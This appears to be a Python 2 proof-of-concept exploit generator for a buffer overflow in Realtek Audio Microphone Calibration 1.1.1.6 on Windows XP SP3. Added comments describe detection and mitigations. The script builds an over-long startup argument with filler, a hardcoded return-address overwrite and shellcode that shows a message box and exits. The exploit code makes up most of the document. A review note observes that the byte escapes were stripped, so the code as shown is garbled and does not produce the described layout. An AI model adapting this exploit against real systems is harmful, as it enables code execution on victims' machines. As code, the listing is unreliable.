
# Title : Realtek Audio Microphone Calibration 1.1.1.6 Exploit
# Published : 2010-11-14
# Author : BraniX


# done by BraniX <branix@hackers.org.pl>
# www.hackers.org.pl
# found: 2010.08.24
# tested on: Windows XP SP3 Home Edition

# App. has classic buffer overflow vulnerability
# it can be triggered by passing too long an argument
# as a startup parameter. Shellcode can be run via classic
# ret overwrite or SEH Handler overwrite ... so it's a mini-combo ;)

# Ps. If you need generic exploit ...
# (no hardcoded VA's), write it yourself ;) or 'donate few' $$$
# we will c0de it for You ^^

# Proof-of-concept generator: builds the over-long startup argument described
# in the header and saves it to a file. Nothing in this script launches or
# talks to the target application; it only writes data to disk.
#
# Defender notes:
#  - Per the header, the flaw is reached through the program's startup
#    parameter, so a process-creation event for the calibration tool with an
#    abnormally long command line is the observable to alert on.
#  - The layout below relies on fixed values ("no hardcoded VA's" is offered
#    only as a separate, generic version) and was tested on Windows XP SP3
#    Home Edition. Stack cookies (/GS), SafeSEH/SEHOP, DEP and ASLR are the
#    standard mitigations for this bug class.
#
# NOTE(review): Python 2 syntax (print statement at the end).
# NOTE(review): as rendered on this page the string literals are plain ASCII
# ('x90' is three characters, not one byte), so this listing does not emit
# the binary layout the author's comments describe. The page text appears to
# have been altered in extraction.
filepath = "C:\ShellCode\MicCal 1.1.1.6 - Exploit.bin"
f = open(filepath, "wb")

# dummy data
# Filler placed ahead of the value labelled "overwrite ret" below; the count
# of 340 is the author's figure and presumably specific to the tested build.
f.write('x90' * 340)

# overwrite ret
# A single fixed 4-byte value intended to replace the saved return address.
# What lives at that address is not shown here; it is only meaningful for the
# memory layout of the author's test system.
f.write('xD7x30x9Dx7C')
# Author tag plus 8 filler characters between the return-address value and
# the payload; their exact role is not stated in the source.
f.write("[BraniX]")
f.write('A' * 8)

# start shellcode
# Demonstration payload only: according to the author's inline comments it
# sets up a small stack buffer, shows a message box and then exits the
# process. It is evidence of control-flow hijack, not a functional implant.
f.write('x83xECx08')         # sub esp,8
f.write('x88x04x24')         # mov byte ptr [esp], al
f.write('x83xECx08')         # sub esp,8

f.write('x54')                 # push esp
f.write('x5B')                 # pop ebx

f.write('x50')                 # push eax
f.write('x53')                 # push ebx
f.write('x53')                 # push ebx
f.write('x50')                 # push eax

# The two call operands below are fixed values; they resolve to the named
# APIs only for one specific memory layout (presumably the XP SP3 system in
# the header), which is why the author calls this a non-generic exploit.
f.write('xE8x35x08x27x7E') # call user32.MessageBoxA
f.write('x57')                 # push edi

f.write('xE8x57xCBx6Ex7C') # call kernel32.ExitProcess

# Trailing breakpoint instructions after the payload (author: "int 3's").
f.write('xCC' * 10)            # int 3's

# The handle is closed explicitly; there is no try/finally, so an exception
# in any write above would skip this close.
f.close()

print "Done ..."